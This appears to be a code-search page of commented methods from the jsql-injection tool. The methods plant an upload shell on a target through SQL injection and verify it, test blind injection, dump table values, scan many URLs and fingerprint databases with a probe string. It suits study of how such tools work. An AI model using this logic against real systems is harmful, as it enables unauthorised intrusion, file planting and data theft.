
Example 16 with Request

use of com.jsql.model.bean.util.Request in project jsql-injection by ron190.

the class ResourceAccess method uploadFile.

/**
 * Writes the upload payload to the target through the injection, verifies it by
 * reading it back, then sends {@code file} through it.
 * <p>
 * Steps, in order: decode the payload stored under the {@code shell.upload} property,
 * write it under {@code pathFile} with the vendor's text-into-file query, read the same
 * remote file back and check that it contains what was sent, upload {@code file} over
 * HTTP, and finally notify the views with {@code Interaction.END_UPLOAD}.
 * <p>
 * Returns without doing anything, and without any message, when
 * {@code isReadingAllowed()} is false.
 *
 * @param pathFile remote directory in which the payload file is written; a trailing
 *                 {@code /} is appended when missing
 * @param urlFile URL under which that directory is served; when empty, the base URL of
 *                the current connection, cut after its last {@code /}, is used instead
 * @param file local file to upload
 * @throws JSqlException at least when the payload read back is empty or does not contain
 *                       the payload that was sent
 * @throws IOException declared; presumably raised while opening {@code file} or during
 *                     the HTTP upload (confirm against {@code upload()})
 * @throws InterruptedException declared; presumably propagated from the HTTP upload
 *                              (confirm against {@code upload()})
 */
public void uploadFile(String pathFile, String urlFile, File file) throws JSqlException, IOException, InterruptedException {
    // Gate: nothing is written or uploaded unless the read check passes.
    if (!this.isReadingAllowed()) {
        return;
    }
    // The payload is stored base64-encoded in the properties; after decoding, its
    // SHELL_LEAD placeholder is replaced with the LEAD marker.
    String sourceShellToInject = StringUtil.base64Decode(this.injectionModel.getMediatorUtils().getPropertiesUtil().getProperties().getProperty("shell.upload")).replace(DataAccess.SHELL_LEAD, DataAccess.LEAD);
    // Normalise the remote directory so the file name can be appended directly.
    String pathShellFixed = pathFile;
    if (!pathShellFixed.matches(".*/$")) {
        pathShellFixed += "/";
    }
    // Write the payload, wrapped between <LEAD> and <TRAIL> markers, into the remote file.
    this.injectionModel.injectWithoutIndex(this.injectionModel.getMediatorVendor().getVendor().instance().sqlTextIntoFile("<" + DataAccess.LEAD + ">" + sourceShellToInject + "<" + DataAccess.TRAIL + ">", pathShellFixed + this.filenameUpload), "upload");
    // One-element array handed to the read below and then to getIntegrityError();
    // presumably filled with the raw page by SuspendableGetRows (TODO confirm).
    var sourcePage = new String[] { StringUtils.EMPTY };
    String sourceShellInjected;
    try {
        // Read the file back through the injection to check what was actually written.
        sourceShellInjected = new SuspendableGetRows(this.injectionModel).run(this.injectionModel.getMediatorVendor().getVendor().instance().sqlFileRead(pathShellFixed + this.filenameUpload), sourcePage, false, 1, null, "upload");
        if (StringUtils.isEmpty(sourceShellInjected)) {
            // Caught by the handler just below and replaced by the integrity error.
            throw new JSqlException("Bad payload integrity: Empty payload");
        }
    } catch (JSqlException e) {
        // NOTE(review): the caught exception is discarded here; the integrity error
        // is built from sourcePage only, so the original cause is not reported.
        throw this.getIntegrityError(sourcePage);
    }
    // Without an explicit URL, fall back to the connection's base URL up to and
    // including its last '/'.
    String urlFileFixed = urlFile;
    if (StringUtils.isEmpty(urlFileFixed)) {
        urlFileFixed = this.injectionModel.getMediatorUtils().getConnectionUtil().getUrlBase().substring(0, this.injectionModel.getMediatorUtils().getConnectionUtil().getUrlBase().lastIndexOf('/') + 1);
    }
    // Integrity check: the content read back must contain the payload that was sent.
    if (sourceShellInjected.indexOf(sourceShellToInject) > -1) {
        // Copies for the logging lambdas, which can only capture effectively final locals.
        String logUrlFileFixed = urlFileFixed;
        String logPathShellFixed = pathShellFixed;
        // NOTE(review): the URL logged here is urlFileFixed + filenameUpload, while the
        // request below inserts an extra "/" between them, so the logged URL and the
        // requested URL can differ.
        LOGGER.log(LogLevel.CONSOLE_SUCCESS, "Upload payload deployed at '{}{}' in '{}{}'", () -> logUrlFileFixed, () -> this.filenameUpload, () -> logPathShellFixed, () -> this.filenameUpload);
        // try-with-resources closes the local file stream whether or not the upload succeeds.
        try (InputStream streamToUpload = new FileInputStream(file)) {
            HttpResponse<String> result = this.upload(file, urlFileFixed + "/" + this.filenameUpload, streamToUpload);
            this.confirmUpload(file, pathShellFixed, urlFileFixed, result);
        }
    } else {
        // The payload sent was not found in what was read back.
        throw this.getIntegrityError(sourcePage);
    }
    // Reached only when no exception was thrown above: tell the views the upload is over.
    var request = new Request();
    request.setMessage(Interaction.END_UPLOAD);
    this.injectionModel.sendToViews(request);
}
Also used : JSqlException(com.jsql.model.exception.JSqlException) SuspendableGetRows(com.jsql.model.suspendable.SuspendableGetRows) FileInputStream(java.io.FileInputStream) InputStream(java.io.InputStream) HttpRequest(java.net.http.HttpRequest) Request(com.jsql.model.bean.util.Request) FileInputStream(java.io.FileInputStream)

Example 17 with Request

use of com.jsql.model.bean.util.Request in project jsql-injection by ron190.

the class StrategyInjectionBlind method checkApplicability.

/**
 * Checks whether the boolean Blind strategy can be used on the current target.
 * <p>
 * Nothing is tested when the current vendor defines no boolean Blind query. Otherwise
 * AND mode is tried first and OR mode only if AND is not injectable. When one of them
 * works the strategy is allowed and the views receive {@code Interaction.MESSAGE_BINARY}
 * with the info message of the working mode; when neither works the strategy is unallowed.
 *
 * @throws StoppedByUserSlidingException declared; presumably raised by the injectability
 *                                       test when the user stops it (confirm against
 *                                       {@code InjectionBlind})
 */
@Override
public void checkApplicability() throws StoppedByUserSlidingException {
    var blindQuery = this.injectionModel.getMediatorVendor().getVendor().instance().sqlBooleanBlind();
    if (StringUtils.isEmpty(blindQuery)) {
        // The vendor has no boolean Blind query: report it and leave the state untouched.
        LOGGER.log(LogLevel.CONSOLE_INFORM, "No Blind strategy known for {}", this.injectionModel.getMediatorVendor().getVendor());
        return;
    }

    // First attempt: AND mode.
    LOGGER.log(LogLevel.CONSOLE_DEFAULT, "{} Blind with AND...", () -> I18nUtil.valueByKey("LOG_CHECKING_STRATEGY"));
    this.injectionBlind = new InjectionBlind(this.injectionModel, BooleanMode.AND);
    this.isApplicable = this.injectionBlind.isInjectable();

    if (this.isApplicable) {
        LOGGER.log(LogLevel.CONSOLE_SUCCESS, "{} Blind injection with AND", () -> I18nUtil.valueByKey("LOG_VULNERABLE"));
    } else {
        // Second attempt, only after AND failed: OR mode replaces the AND instance.
        LOGGER.log(LogLevel.CONSOLE_DEFAULT, "{} Blind with OR...", () -> I18nUtil.valueByKey("LOG_CHECKING_STRATEGY"));
        this.injectionBlind = new InjectionBlind(this.injectionModel, BooleanMode.OR);
        this.isApplicable = this.injectionBlind.isInjectable();
        if (this.isApplicable) {
            LOGGER.log(LogLevel.CONSOLE_SUCCESS, "{} Blind injection with OR", () -> I18nUtil.valueByKey("LOG_VULNERABLE"));
        }
    }

    if (!this.isApplicable) {
        this.unallow();
        return;
    }

    // A mode worked: enable the strategy and forward its info message to the views.
    this.allow();
    var binaryMessage = new Request();
    binaryMessage.setMessage(Interaction.MESSAGE_BINARY);
    binaryMessage.setParameters(this.injectionBlind.getInfoMessage());
    this.injectionModel.sendToViews(binaryMessage);
}
Also used : InjectionBlind(com.jsql.model.injection.strategy.blind.InjectionBlind) Request(com.jsql.model.bean.util.Request)

Example 18 with Request

use of com.jsql.model.bean.util.Request in project jsql-injection by ron190.

the class DataAccess method listValues.

/**
 * Fetches the values of the selected columns and publishes them to the views.
 * <p>
 * The table and database are taken from the parent chain of the first column, so the
 * list must hold at least one column. The views receive
 * {@code Interaction.START_PROGRESS}, then {@code Interaction.CREATE_VALUES_TAB} with
 * the column titles, the values and the table, then {@code Interaction.END_PROGRESS}.
 * <p>
 * As described by the original notes: values come back as clear text (not hexadecimal)
 * in a window of the form {@code hh[value 1]jj[count]hhgghh[value 2]jj[count]hhggh...hi};
 * the window may be cut before the end of the request, in which case the process fetches
 * the remaining data, and the user can stop or pause it.
 *
 * @param columns columns chosen by the user
 * @return a two-dimensional array of the values; its columns start with two untitled
 *         ones (row number and occurrence) followed by the selected columns
 * @throws JSqlException when the injection fails or is stopped by the user
 */
public String[][] listValues(List<Column> columns) throws JSqlException {
    // Table and database are resolved from the first column's parent chain.
    var parentOfFirstColumn = columns.get(0).getParent();
    var database = (Database) parentOfFirstColumn.getParent();
    var table = (Table) parentOfFirstColumn;
    int rowCount = parentOfFirstColumn.getChildCount();

    // Tell the views that work on this table is starting.
    var startProgress = new Request();
    startProgress.setMessage(Interaction.START_PROGRESS);
    startProgress.setParameters(table);
    this.injectionModel.sendToViews(startProgress);

    // Names of the selected columns, in selection order.
    List<String> titles = new ArrayList<>();
    columns.forEach(column -> titles.add(column.toString()));

    // Only the selected names are passed to getRows(); how they are turned into SQL
    // fields is up to that method.
    String[] selectedNames = titles.toArray(new String[0]);
    List<List<String>> rows = this.getRows(database, table, rowCount, selectedNames);

    // Two leading untitled columns: row number and occurrence.
    titles.addAll(0, List.of(StringUtils.EMPTY, StringUtils.EMPTY));
    String[][] tableDatas = this.build2D(titles, rows);
    String[] allTitles = titles.toArray(new String[0]);

    // Titles, values and the Table object travel together in a single parameter.
    var createValuesTab = new Request();
    createValuesTab.setMessage(Interaction.CREATE_VALUES_TAB);
    createValuesTab.setParameters(new Object[] { allTitles, tableDatas, table });
    this.injectionModel.sendToViews(createValuesTab);

    var endProgress = new Request();
    endProgress.setMessage(Interaction.END_PROGRESS);
    endProgress.setParameters(table);
    this.injectionModel.sendToViews(endProgress);

    return tableDatas;
}
Also used : Table(com.jsql.model.bean.database.Table) Request(com.jsql.model.bean.util.Request) ArrayList(java.util.ArrayList) AbstractElementDatabase(com.jsql.model.bean.database.AbstractElementDatabase) AbstractElementDatabase(com.jsql.model.bean.database.AbstractElementDatabase) Database(com.jsql.model.bean.database.Database) ArrayList(java.util.ArrayList) List(java.util.List)

Example 19 with Request

use of com.jsql.model.bean.util.Request in project jsql-injection by ron190.

the class ManagerScan method scan.

/**
 * Runs a quick scan over a list of URLs, one after the other.
 * <p>
 * The interface is reset, the current views are unsubscribed and a
 * {@code ScanListTerminal} is subscribed in their place, so that results are reported
 * as plain text rather than through the graphical components. Each item is then handed
 * to {@code controlInput(...)} with a 500 ms pause after it. The loop ends early when
 * the model reports a user stop or the resource access reports a stopped scan. Afterwards
 * the frame's subscriber is plugged back, the scan and stop flags are cleared and the
 * views receive {@code Interaction.END_SCAN}.
 *
 * @param urlsItemList items to scan; each one is cast to {@code ItemListScan}
 */
public void scan(List<ItemList> urlsItemList) {
    // Clear whatever a previous injection left in the view.
    var resetInterface = new Request();
    resetInterface.setMessage(Interaction.RESET_INTERFACE);
    MediatorHelper.model().sendToViews(resetInterface);

    // Give any interaction still running from the previous injection time to finish.
    try {
        Thread.sleep(500);
    } catch (InterruptedException e) {
        LOGGER.log(LogLevel.CONSOLE_JAVA, e, e);
        Thread.currentThread().interrupt();
    }

    // Swap the subscribed views for the console-style scan listener.
    var unsubscribeViews = new Request();
    unsubscribeViews.setMessage(Interaction.UNSUBSCRIBE);
    MediatorHelper.model().sendToViews(unsubscribeViews);
    MediatorHelper.model().subscribe(new ScanListTerminal());

    MediatorHelper.model().setIsScanning(true);
    MediatorHelper.model().getResourceAccess().setScanStopped(false);

    for (ItemList item : urlsItemList) {
        var scanItem = (ItemListScan) item;

        // Stop requests are honoured between two targets, before the next one starts.
        boolean isScanStillWanted = !MediatorHelper.model().isStoppedByUser() && !MediatorHelper.model().getResourceAccess().isScanStopped();
        if (!isScanStillWanted) {
            break;
        }

        var target = scanItem.getBeanInjection();
        LOGGER.log(LogLevel.CONSOLE_INFORM, "Scanning {}", target.getUrl());
        MediatorHelper.model().getMediatorUtils().getParameterUtil().controlInput(
            target.getUrl(),
            target.getRequest(),
            target.getHeader(),
            target.getMethodInstance(),
            target.getRequestType(),
            true
        );

        // Same pause as before the loop, now between two targets.
        try {
            Thread.sleep(500);
        } catch (InterruptedException e) {
            LOGGER.log(LogLevel.CONSOLE_JAVA, e, e);
            Thread.currentThread().interrupt();
        }
    }

    // Restore the normal view: the same UNSUBSCRIBE request is sent again, then the
    // frame's subscriber is plugged back in.
    MediatorHelper.model().sendToViews(unsubscribeViews);
    MediatorHelper.model().subscribe(MediatorHelper.frame().getSubscriber());

    // Clear the scan state so the next run starts clean.
    MediatorHelper.model().setIsScanning(false);
    MediatorHelper.model().setIsStoppedByUser(false);
    MediatorHelper.model().getResourceAccess().setScanStopped(false);

    var endScan = new Request();
    endScan.setMessage(Interaction.END_SCAN);
    MediatorHelper.model().sendToViews(endScan);
}
Also used : ScanListTerminal(com.jsql.view.scan.ScanListTerminal) ItemList(com.jsql.view.swing.list.ItemList) Request(com.jsql.model.bean.util.Request) ItemListScan(com.jsql.view.swing.list.ItemListScan)

Example 20 with Request

use of com.jsql.model.bean.util.Request in project jsql-injection by ron190.

the class MediatorVendor method fingerprintVendor.

/**
 * Determines the database vendor to use and announces it to the views.
 * <p>
 * When the user selected a vendor other than the automatic one, that vendor is returned
 * as is. Otherwise a probe string is injected and the returned page is matched,
 * case-insensitively and across lines, against each vendor's
 * {@code fingerprintErrorsAsRegex()}; the first vendor whose pattern matches wins. The
 * outcome, which may still be {@code null} when nothing matched, is then passed through
 * {@code initializeVendor(...)}. In both cases the views receive
 * {@code Interaction.SET_VENDOR} with the result.
 *
 * @return the vendor forced by the user, or whatever {@code initializeVendor(...)}
 *         returns for the fingerprinting outcome
 */
public Vendor fingerprintVendor() {
    Vendor detectedVendor = null;

    boolean isVendorLeftOnAuto = this.injectionModel.getMediatorVendor().getVendorByUser() == this.injectionModel.getMediatorVendor().getAuto();
    if (isVendorLeftOnAuto) {
        LOGGER.log(LogLevel.CONSOLE_DEFAULT, "Fingerprinting database...");

        // The whole match relies on this page source; presumably it only succeeds when
        // the target echoes database error text in its response (confirm against the
        // vendor patterns).
        String responseBody = this.injectionModel.injectWithoutIndex("'\"#-)'\"*", "test#vendor");

        var mediatorVendor = this.injectionModel.getMediatorVendor();
        // Every known vendor except the automatic placeholder.
        Vendor[] candidates = mediatorVendor.getVendors()
            .stream()
            .filter(vendor -> vendor != mediatorVendor.getAuto())
            .toArray(Vendor[]::new);

        for (Vendor candidate : candidates) {
            boolean isSignatureFound = responseBody.matches("(?si)" + candidate.instance().fingerprintErrorsAsRegex());
            if (!isSignatureFound) {
                continue;
            }
            // First match wins; remaining vendors are not tested.
            detectedVendor = candidate;
            LOGGER.log(LogLevel.CONSOLE_SUCCESS, MediatorVendor.LOG_VENDOR, () -> "Basic fingerprint matching vendor", () -> candidate);
            break;
        }

        // Called even when no pattern matched, i.e. with null.
        detectedVendor = this.initializeVendor(detectedVendor);
    } else {
        // The user forced a vendor: no request is sent for fingerprinting.
        detectedVendor = this.injectionModel.getMediatorVendor().getVendorByUser();
        LOGGER.log(LogLevel.CONSOLE_INFORM, MediatorVendor.LOG_VENDOR, () -> I18nUtil.valueByKey("LOG_DATABASE_TYPE_FORCED_BY_USER"), () -> this.injectionModel.getMediatorVendor().getVendorByUser());
    }

    var setVendor = new Request();
    setVendor.setMessage(Interaction.SET_VENDOR);
    setVendor.setParameters(detectedVendor);
    this.injectionModel.sendToViews(setVendor);

    return detectedVendor;
}
Also used : Arrays(java.util.Arrays) VendorYaml(com.jsql.model.injection.vendor.model.VendorYaml) EnumMap(java.util.EnumMap) StringUtils(org.apache.commons.lang3.StringUtils) Header(com.jsql.model.bean.util.Header) Interaction(com.jsql.model.bean.util.Interaction) List(java.util.List) Logger(org.apache.logging.log4j.Logger) Request(com.jsql.model.bean.util.Request) Map(java.util.Map) LogLevel(com.jsql.util.LogLevel) Vendor(com.jsql.model.injection.vendor.model.Vendor) I18nUtil(com.jsql.util.I18nUtil) LogManager(org.apache.logging.log4j.LogManager) InjectionModel(com.jsql.model.InjectionModel) Request(com.jsql.model.bean.util.Request) Vendor(com.jsql.model.injection.vendor.model.Vendor)

Aggregations

Request (com.jsql.model.bean.util.Request)47 ArrayList (java.util.ArrayList)13 Header (com.jsql.model.bean.util.Header)12 EnumMap (java.util.EnumMap)12 ExecutorCompletionService (java.util.concurrent.ExecutorCompletionService)11 ExecutorService (java.util.concurrent.ExecutorService)11 JSqlException (com.jsql.model.exception.JSqlException)10 SuspendableGetRows (com.jsql.model.suspendable.SuspendableGetRows)9 IOException (java.io.IOException)9 ThreadFactoryCallable (com.jsql.model.suspendable.callable.ThreadFactoryCallable)8 ExecutionException (java.util.concurrent.ExecutionException)8 InjectionFailureException (com.jsql.model.exception.InjectionFailureException)7 ItemList (com.jsql.view.swing.list.ItemList)7 MalformedURLException (java.net.MalformedURLException)6 HttpRequest (java.net.http.HttpRequest)6 URL (java.net.URL)5 List (java.util.List)5 Matcher (java.util.regex.Matcher)5 IgnoreMessageException (com.jsql.model.exception.IgnoreMessageException)4 StoppedByUserSlidingException (com.jsql.model.exception.StoppedByUserSlidingException)4